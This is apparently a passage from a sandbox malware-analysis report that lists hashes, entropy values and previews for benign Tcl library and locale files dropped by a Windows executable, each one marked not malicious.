                                                                                                                                                                                                                              SHA-512:09CE408886E2CEADDF70786A15D63AF9A930E70CAC4286AC9DDD2094C8EDCF97A2ADC2D3D2659B123F88719340D3B00D9F96E9BC7C8B55192735C290E7D24683
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# http.tcl..# Client-side HTTP for GET, POST, and HEAD commands...# These routines can be used in untrusted code that uses the Safesock..# security policy...# These procedures use a callback interface to avoid using vwait,..# which is not defined in the safe base...#..# See the http.n man page for documentation....package provide http 1.0....array set http {.. -accept */*.. -proxyhost {}.. -proxyport {}.. -useragent {Tcl http client package 1.0}.. -proxyfilter httpProxyRequired..}..proc http_config {args} {.. global http.. set options [lsort [array names http -*]].. set usage [join $options ", "].. if {[llength $args] == 0} {...set result {}...foreach name $options {... lappend result $name $http($name)...}...return $result.. }.. regsub -all -- - $options {} options.. set pat ^-([join $options |])$.. if {[llength $args] == 1} {...set flag [lindex $args 0]...if {[regexp -- $pat $flag]} {... return $http($flag)...} else {... return -code er
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):746
                                                                                                                                                                                                                              Entropy (8bit):4.711041943572035
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:jHx5XRsLzhjJS42wbGlTULuUAZb3KykszLl7+HkuRz20JSv6C3l5kMn:bHRsRJS42wbGlTUcZ+yk2Lli1z2jxXkM
                                                                                                                                                                                                                              MD5:A387908E2FE9D84704C2E47A7F6E9BC5
                                                                                                                                                                                                                              SHA1:F3C08B3540033A54A59CB3B207E351303C9E29C6
                                                                                                                                                                                                                              SHA-256:77265723959C092897C2449C5B7768CA72D0EFCD8C505BDDBB7A84F6AA401339
                                                                                                                                                                                                                              SHA-512:7AC804D23E72E40E7B5532332B4A8D8446C6447BB79B4FE32402B13836079D348998EA0659802AB0065896D4F3C06F5866C6B0D90BF448F53E803D8C243BBC63
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Tcl package index file, version 1.0..# This file is generated by the "pkg_mkIndex" command..# and sourced either when an application starts up or..# by a "package unknown" script. It invokes the..# "package ifneeded" command to set up package-related..# information so that packages will be loaded automatically..# in response to "package require" commands. When this..# script is sourced, the variable $dir must contain the..# full path name of this file's directory.....package ifneeded http 1.0 [list tclPkgSetup $dir http 1.0 {{http.tcl source {httpCopyDone httpCopyStart httpEof httpEvent httpFinish httpMapReply httpProxyRequired http_code http_config http_data http_formatQuery http_get http_reset http_size http_status http_wait}}}]..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):25633
                                                                                                                                                                                                                              Entropy (8bit):4.885492991636381
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:cXugPHudKlExBG+Xg3Qonlm6ofRRECLSQDjr5vkhzx/i:hgGdKli4eonlm6offLzehNi
                                                                                                                                                                                                                              MD5:FE92C81BB4ACDDA00761C695344D5F1E
                                                                                                                                                                                                                              SHA1:A87E1516FBD1F9751EC590273925CBC5284B16BD
                                                                                                                                                                                                                              SHA-256:7A103A85413988456C2AD615C879BBCB4D91435BCFBBE23393E0EB52B56AF6E2
                                                                                                                                                                                                                              SHA-512:C983076E420614D12AB2A7342F6F74DD5DCDAD21C7C547F660E73B74B3BE487A560ABD73213DF3F58BE3D9DBD061A12D2956CA85A58D7B9D9E40D9FA6E6C25EB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# init.tcl --..#..# Default system startup file for Tcl-based applications. Defines..# "unknown" procedure and auto-load facilities...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994-1996 Sun Microsystems, Inc...# Copyright (c) 1998-1999 Scriptics Corporation...# Copyright (c) 2004 Kevin B. Kenny. All rights reserved...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# This test intentionally written in pre-7.5 Tcl..if {[info commands package] == ""} {.. error "version mismatch: library\nscripts expect Tcl version 7.5b1 or later but the loaded version is\nonly [info patchlevel]"..}..package require -exact Tcl 8.6.13....# Compute the auto path to use in this interpreter...# The values on the path come from several locations:..#..# The environment variable TCLLIBPATH..#..# tcl_library, which is the directory containing this init.tcl script...# [t
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1188
                                                                                                                                                                                                                              Entropy (8bit):4.314271783103334
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR835k0CM/hlrXa754pD73/tKSx54pbIK5f2CA:43W05rXUa173/VadDA
                                                                                                                                                                                                                              MD5:67D137E5D853DB61A4B4264871E793F7
                                                                                                                                                                                                                              SHA1:4280E7F662DE792175AF8B4C93874F035F716F0F
                                                                                                                                                                                                                              SHA-256:880806867ACABD9B39E3029A5ADD26B690CC5709082D43B0959EBA725EA07AB5
                                                                                                                                                                                                                              SHA-512:C27B745143539D3E6D94BB754DCA35065CDE9B1AA6EE038D47F658175CFACC20236124D38BE5BBB03CAF8F613BD748C43CB8DFCC9234E915D18B5A477BAEF94E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ga DAYS_OF_WEEK_ABBREV [list \.. "Domh"\.. "Luan"\.. "M\u00e1irt"\.. "C\u00e9ad"\.. "D\u00e9ar"\.. "Aoine"\.. "Sath"].. ::msgcat::mcset ga DAYS_OF_WEEK_FULL [list \.. "D\u00e9 Domhnaigh"\.. "D\u00e9 Luain"\.. "D\u00e9 M\u00e1irt"\.. "D\u00e9 C\u00e9adaoin"\.. "D\u00e9ardaoin"\.. "D\u00e9 hAoine"\.. "D\u00e9 Sathairn"].. ::msgcat::mcset ga MONTHS_ABBREV [list \.. "Ean"\.. "Feabh"\.. "M\u00e1rta"\.. "Aib"\.. "Beal"\.. "Meith"\.. "I\u00fail"\.. "L\u00fan"\.. "MF\u00f3mh"\.. "DF\u00f3mh"\.. "Samh"\.. "Noll"\.. ""].. ::msgcat::mcset ga MONTHS_FULL [list \.. "Ean\u00e1ir"\.. "Feabhra"\.. "M\u00e1rta"\.. "Aibre\u00e1n"\.. "M\u00ed na Bealtaine"\.. "Meith"\..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):286
                                                                                                                                                                                                                              Entropy (8bit):4.824539027053997
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xobHAygDobHAqo+3vLjobHAqo+3v6mjobHAy9+3vnFDoAkv:4EnLB383p23vy3v6a3v9dmn
                                                                                                                                                                                                                              MD5:C27BD7F317AAADB380F4C38AE0D2FDA6
                                                                                                                                                                                                                              SHA1:79870A0E68AA0A9B301414EDC21889F83BB81E40
                                                                                                                                                                                                                              SHA-256:3F9615C617D3CDBC1E127B3EFEE785B0CB5E92E17B7DABAC80DA2BEAF076362C
                                                                                                                                                                                                                              SHA-512:3605B9A914284CF1D3CC90DF2F21A86C0472AEE59800942DC93D842C7AE164E1DA72813787F163DC80B72269D2C391953ABAD6A8B72CCF069BEE96D418A173E9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ga_IE DATE_FORMAT "%d.%m.%y".. ::msgcat::mcset ga_IE TIME_FORMAT "%T".. ::msgcat::mcset ga_IE TIME_FORMAT_12 "%T".. ::msgcat::mcset ga_IE DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):997
                                                                                                                                                                                                                              Entropy (8bit):4.120890519790248
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83okzalCcPdJ5rK8yzMY4JlV1ZDqqIkFo8w:43JkPj9K8y4HHZLIQtw
                                                                                                                                                                                                                              MD5:A3D098C1A47E380F7C25233A52FBDE38
                                                                                                                                                                                                                              SHA1:C97E4EAA9E7A7F99950F422B93C57134B532C639
                                                                                                                                                                                                                              SHA-256:34D61B49DBF9584893051FFB458D6DE9E7E2E7774AC0011F70C4DD4184EBA81C
                                                                                                                                                                                                                              SHA-512:4687AB3D2FAA65FED90678EBC08C074959E93A9FEFAF3D61EEE39DB08FD200CB57C0DDB4DDBF6451FE1EF5E07EA976EDEF830769FF403CE51734129CEF24DA9F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset gl DAYS_OF_WEEK_ABBREV [list \.. "Dom"\.. "Lun"\.. "Mar"\.. "M\u00e9r"\.. "Xov"\.. "Ven"\.. "S\u00e1b"].. ::msgcat::mcset gl DAYS_OF_WEEK_FULL [list \.. "Domingo"\.. "Luns"\.. "Martes"\.. "M\u00e9rcores"\.. "Xoves"\.. "Venres"\.. "S\u00e1bado"].. ::msgcat::mcset gl MONTHS_ABBREV [list \.. "Xan"\.. "Feb"\.. "Mar"\.. "Abr"\.. "Mai"\.. "Xu\u00f1"\.. "Xul"\.. "Ago"\.. "Set"\.. "Out"\.. "Nov"\.. "Dec"\.. ""].. ::msgcat::mcset gl MONTHS_FULL [list \.. "Xaneiro"\.. "Febreiro"\.. "Marzo"\.. "Abril"\.. "Maio"\.. "Xu\u00f1o"\.. "Xullo"\.. "Agosto"\.. "Setembro"\.. "Outubro"\.. "Novembro"\.. "Decembro"\.. ""]..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.886176304042503
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoPhkgMoPxsF3v6ay/5oPhk9+3vR6HyFvn:4EnLB383WrfK3v6ay/WJ3voSVn
                                                                                                                                                                                                                              MD5:78B9163C5E8E5E7049CBF91D1A5889A4
                                                                                                                                                                                                                              SHA1:F2F07AF3D79D61C8E0C73B13E2CA8266E10E396B
                                                                                                                                                                                                                              SHA-256:B5688CA07D713227B713655877710258CD503617E8DF79293A971649E3134F05
                                                                                                                                                                                                                              SHA-512:E86074B687670542CFA097C94D150292E1A73C9F231E92CD84386580A446569CC6F8F5817F46ED64A1D00F95D59F6F1F5D4B961DF3C8335938D83F3517794353
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset gl_ES DATE_FORMAT "%d %B %Y".. ::msgcat::mcset gl_ES TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset gl_ES DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1084
                                                                                                                                                                                                                              Entropy (8bit):4.213672208102291
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR832vTXAC2/fS5JfaCroeLaCAQbSm5qJe1:43QTXs32zrf
                                                                                                                                                                                                                              MD5:518FC3964D50854081FB79189A42D3E7
                                                                                                                                                                                                                              SHA1:59392F16CD56E3E6A685F78974D539FB3A972B98
                                                                                                                                                                                                                              SHA-256:404795F2C88D0038F9ED0B5120A251D26EDF8B236E1B1698BC71ACD4DC75AC45
                                                                                                                                                                                                                              SHA-512:E5C88CAB8741D631938CEC2E0959C0FE26685C395F5F9F4F1B5C9E146E84D23D897CD7A823AB46D4B62C590AE15EC76B87EB59308ACFB1BB6F61398890B43622
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset gv DAYS_OF_WEEK_ABBREV [list \.. "Jed"\.. "Jel"\.. "Jem"\.. "Jerc"\.. "Jerd"\.. "Jeh"\.. "Jes"].. ::msgcat::mcset gv DAYS_OF_WEEK_FULL [list \.. "Jedoonee"\.. "Jelhein"\.. "Jemayrt"\.. "Jercean"\.. "Jerdein"\.. "Jeheiney"\.. "Jesarn"].. ::msgcat::mcset gv MONTHS_ABBREV [list \.. "J-guer"\.. "T-arree"\.. "Mayrnt"\.. "Avrril"\.. "Boaldyn"\.. "M-souree"\.. "J-souree"\.. "Luanistyn"\.. "M-fouyir"\.. "J-fouyir"\.. "M.Houney"\.. "M.Nollick"\.. ""].. ::msgcat::mcset gv MONTHS_FULL [list \.. "Jerrey-geuree"\.. "Toshiaght-arree"\.. "Mayrnt"\.. "Averil"\.. "Boaldyn"\.. "Mean-souree"\.. "Jerrey-souree"\.. "Luanistyn"\.. "Mean-fouyir"\..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.936566750568767
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoQbtvMoQLE3v6ay/5oQbto+3vR6HyFvn:4EnLB383PbtvALE3v6ay/PbtF3voSVn
                                                                                                                                                                                                                              MD5:0B6BE614EF5F5F25A30D2D33701A9F94
                                                                                                                                                                                                                              SHA1:65800FBD73D9DAE550E04E1D818A6B9D1AEF86FE
                                                                                                                                                                                                                              SHA-256:86CABF3B9360C0E686CC4CBEB843E971C28BC6D35210ED378B54EB58CC41F3D5
                                                                                                                                                                                                                              SHA-512:376D21B38DA49A8F7C2983F2B808FD55AC9F6383BC66DF28DB99DBF61FDC9FFF8CD20F077EC3ED873EF47F0F613BDD9AD02DFFB1CB51F9A36715C7FC798C3B70
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset gv_GB DATE_FORMAT "%d %B %Y".. ::msgcat::mcset gv_GB TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset gv_GB DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1990
                                                                                                                                                                                                                              Entropy (8bit):4.298934047406144
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83Y71LCLxL0eCLbCLKCLaCLXL7CLB0p1dLGCoCLU5LT5Gv5LJ9p5LnLEHLGCh:43sl7KqpU/nNbhbOezd2ICn
                                                                                                                                                                                                                              MD5:A0E60036EB17208A449AAFC3AAAE622C
                                                                                                                                                                                                                              SHA1:9D7479BA85FBB00A2DF2B61F4ED2CBEA8F1EC8C3
                                                                                                                                                                                                                              SHA-256:787DA79AF58872BF45AB09E3B6A920A4496B5BD8A4F3C7F010CF013EC2E8EFE0
                                                                                                                                                                                                                              SHA-512:46D12C14B5736E5EA97EB728BF58999E9D7C2CF910D8F5AFA3F5D3A86329ABF41A3E2BEBD81EE4EF64BEA0DC173B77A9FE12471C1BD9D768ED552A55B3B80213
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset he DAYS_OF_WEEK_ABBREV [list \.. "\u05d0"\.. "\u05d1"\.. "\u05d2"\.. "\u05d3"\.. "\u05d4"\.. "\u05d5"\.. "\u05e9"].. ::msgcat::mcset he DAYS_OF_WEEK_FULL [list \.. "\u05d9\u05d5\u05dd \u05e8\u05d0\u05e9\u05d5\u05df"\.. "\u05d9\u05d5\u05dd \u05e9\u05e0\u05d9"\.. "\u05d9\u05d5\u05dd \u05e9\u05dc\u05d9\u05e9\u05d9"\.. "\u05d9\u05d5\u05dd \u05e8\u05d1\u05d9\u05e2\u05d9"\.. "\u05d9\u05d5\u05dd \u05d7\u05de\u05d9\u05e9\u05d9"\.. "\u05d9\u05d5\u05dd \u05e9\u05d9\u05e9\u05d9"\.. "\u05e9\u05d1\u05ea"].. ::msgcat::mcset he MONTHS_ABBREV [list \.. "\u05d9\u05e0\u05d5"\.. "\u05e4\u05d1\u05e8"\.. "\u05de\u05e8\u05e5"\.. "\u05d0\u05e4\u05e8"\.. "\u05de\u05d0\u05d9"\.. "\u05d9\u05d5\u05e0"\.. "\u05d9\u05d5\u05dc"\.. "\u05d0\u05d5\u05d2"\..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1777
                                                                                                                                                                                                                              Entropy (8bit):4.2117128941697715
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:438n4kALqrU1fbokQTbWqrU1fbokQTw38:28OD86D8gM
                                                                                                                                                                                                                              MD5:4219A929E27308ADC04A9F368F063F38
                                                                                                                                                                                                                              SHA1:FA728EEBA8751F4CE032ED32AECFDE124D1B68E2
                                                                                                                                                                                                                              SHA-256:192F4A8E77E1627712F85533C9896EF6A040157C7BD56DF3A4A7FA56AD6746C2
                                                                                                                                                                                                                              SHA-512:223B137AC1FC15908F5541067736EF3A29493549B963393EB78660036A82982E57CFC4AD09CBD33D32A5187FF9F4ACFB5F83A0C974702434B7FAD1B2539B7F76
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset hi DAYS_OF_WEEK_FULL [list \.. "\u0930\u0935\u093f\u0935\u093e\u0930"\.. "\u0938\u094b\u092e\u0935\u093e\u0930"\.. "\u092e\u0902\u0917\u0932\u0935\u093e\u0930"\.. "\u092c\u0941\u0927\u0935\u093e\u0930"\.. "\u0917\u0941\u0930\u0941\u0935\u093e\u0930"\.. "\u0936\u0941\u0915\u094d\u0930\u0935\u093e\u0930"\.. "\u0936\u0928\u093f\u0935\u093e\u0930"].. ::msgcat::mcset hi MONTHS_ABBREV [list \.. "\u091c\u0928\u0935\u0930\u0940"\.. "\u092b\u093c\u0930\u0935\u0930\u0940"\.. "\u092e\u093e\u0930\u094d\u091a"\.. "\u0905\u092a\u094d\u0930\u0947\u0932"\.. "\u092e\u0908"\.. "\u091c\u0942\u0928"\.. "\u091c\u0941\u0932\u093e\u0908"\.. "\u0905\u0917\u0938\u094d\u0924"\.. "\u0938\u093f\u0924\u092e\u094d\u092c\u0930"\.. "\u0905\u0915\u094d\u091f\u0942\u092c\u0930"\.. "\u0928\u0935\u
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.9286948144352865
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xocv+IZoz3v6ry/5oco+3v+6f6HyFvn:4EnLB383Jvlg3v6ry/JF3vmSVn
                                                                                                                                                                                                                              MD5:1C1E1484EA0286175FADCB90937C9F34
                                                                                                                                                                                                                              SHA1:5CA1BF19021D529CB3B3A308EFFFCA7E4D073640
                                                                                                                                                                                                                              SHA-256:5A3BF0DD61BFB5A2BF75E96B11E0E3528FFAB720A0BF1923853606F8CAF0E76D
                                                                                                                                                                                                                              SHA-512:F9A43E1E18ADB6DC6B18BEDC3303A99F514DF6CA54F12100989F734233012D7D60216116915351CCACC12F6942795BF8F3BBD26B15A86E88101067D64BEE54F5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset hi_IN DATE_FORMAT "%d %M %Y".. ::msgcat::mcset hi_IN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset hi_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1171
                                                                                                                                                                                                                              Entropy (8bit):4.36311224714184
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83dVX79VIE9bLTWnh7rT+5dPcdvgrNv5KvOA1:43kmrQ7n+odIrJ6OS
                                                                                                                                                                                                                              MD5:906963A3AD09EAC781B35C190B77484E
                                                                                                                                                                                                                              SHA1:E5AA49DA9C4987EAFA839115F84612426EB8615E
                                                                                                                                                                                                                              SHA-256:105A9180BC5D23738183374FA0EA8DD80484BF3947E1432E515BDC2913C017D9
                                                                                                                                                                                                                              SHA-512:557BD1C8306750D09215D9774069A52C7D60E03DE2DF39FF909A8F658AB0565739D127E24ACDC96F736C69A71BEFA30B8A30BB489C7B7FDEA85386C802166349
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset hr DAYS_OF_WEEK_ABBREV [list \.. "ned"\.. "pon"\.. "uto"\.. "sri"\.. "\u010det"\.. "pet"\.. "sub"].. ::msgcat::mcset hr DAYS_OF_WEEK_FULL [list \.. "nedjelja"\.. "ponedjeljak"\.. "utorak"\.. "srijeda"\.. "\u010detvrtak"\.. "petak"\.. "subota"].. ::msgcat::mcset hr MONTHS_ABBREV [list \.. "sij"\.. "vel"\.. "o\u017eu"\.. "tra"\.. "svi"\.. "lip"\.. "srp"\.. "kol"\.. "ruj"\.. "lis"\.. "stu"\.. "pro"\.. ""].. ::msgcat::mcset hr MONTHS_FULL [list \.. "sije\u010danj"\.. "velja\u010da"\.. "o\u017eujak"\.. "travanj"\.. "svibanj"\.. "lipanj"\.. "srpanj"\.. "kolovoz"\.. "rujan"\.. "listopad"\.. "studeni"\.. "prosinac"\..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1381
                                                                                                                                                                                                                              Entropy (8bit):4.511450677731002
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83IFb7ZTmKrkAYm2LZyyApLDV2uZi5WF+shHUTyvtsv+:43C3ZTmKQAyZyyAp0BotK+
                                                                                                                                                                                                                              MD5:E398158EE1CD49CB5286D9642D4A61DD
                                                                                                                                                                                                                              SHA1:A93A588B0ADD198C067C4BB070DC1E5170E6E208
                                                                                                                                                                                                                              SHA-256:993475532F89E1EA7214ADB265294040862305612D680CFF01DD20615B731CCC
                                                                                                                                                                                                                              SHA-512:9E5791FB97110FE5F7A1F49FF2ED8801A05E49D5B9AF579474C0081073D2B40ECFFE6E4EB5B61F12B1995FDCC0A557CB572E5E116F951FD286A6254253DAEC01
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset hu DAYS_OF_WEEK_ABBREV [list \.. "V"\.. "H"\.. "K"\.. "Sze"\.. "Cs"\.. "P"\.. "Szo"].. ::msgcat::mcset hu DAYS_OF_WEEK_FULL [list \.. "vas\u00e1rnap"\.. "h\u00e9tf\u0151"\.. "kedd"\.. "szerda"\.. "cs\u00fct\u00f6rt\u00f6k"\.. "p\u00e9ntek"\.. "szombat"].. ::msgcat::mcset hu MONTHS_ABBREV [list \.. "jan."\.. "febr."\.. "m\u00e1rc."\.. "\u00e1pr."\.. "m\u00e1j."\.. "j\u00fan."\.. "j\u00fal."\.. "aug."\.. "szept."\.. "okt."\.. "nov."\.. "dec."\.. ""].. ::msgcat::mcset hu MONTHS_FULL [list \.. "janu\u00e1r"\.. "febru\u00e1r"\.. "m\u00e1rcius"\.. "\u00e1prilis"\.. "m\u00e1jus"\.. "j\u00fanius"\.. "j\u00falius"\.. "augusztus"\.. "szeptembe
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):961
                                                                                                                                                                                                                              Entropy (8bit):4.02166638427728
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83dcTcWKutdXaMmEfc2ftdT2dHblWZ0VT:43dQrKutdntdI8g
                                                                                                                                                                                                                              MD5:191ACF2E8A8F10A1360B283D42886382
                                                                                                                                                                                                                              SHA1:EE2C00D021381EA638B6CE3F395DEA5F8491ED9B
                                                                                                                                                                                                                              SHA-256:41C0C3D3B4491E9B36E719466503EFCD325175CB7824C4A5055CB113D347BE0F
                                                                                                                                                                                                                              SHA-512:29BC4F7D3FAE7DE392B175FEA76138FA823B7D9D0B051A19A73F7D36D51DE34E0D0C7C129867307ABF51FC92E70853C15BD96B8484AD21EAB0A8EB83B0411E03
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset id DAYS_OF_WEEK_ABBREV [list \.. "Min"\.. "Sen"\.. "Sel"\.. "Rab"\.. "Kam"\.. "Jum"\.. "Sab"].. ::msgcat::mcset id DAYS_OF_WEEK_FULL [list \.. "Minggu"\.. "Senin"\.. "Selasa"\.. "Rabu"\.. "Kamis"\.. "Jumat"\.. "Sabtu"].. ::msgcat::mcset id MONTHS_ABBREV [list \.. "Jan"\.. "Peb"\.. "Mar"\.. "Apr"\.. "Mei"\.. "Jun"\.. "Jul"\.. "Agu"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Des"\.. ""].. ::msgcat::mcset id MONTHS_FULL [list \.. "Januari"\.. "Pebruari"\.. "Maret"\.. "April"\.. "Mei"\.. "Juni"\.. "Juli"\.. "Agustus"\.. "September"\.. "Oktober"\.. "November"\.. "Desember"\.. ""]..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.904408530699153
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xo0kGMo0F/W3v6ay/5o0kT+3vR6HyFvn:4EnLB383wG33v6ay/wK3voSVn
                                                                                                                                                                                                                              MD5:FEB4D50576BF3E11A0A40FD29ABE35A7
                                                                                                                                                                                                                              SHA1:8CEAA187C8AA5EC101743060A877D039850964CA
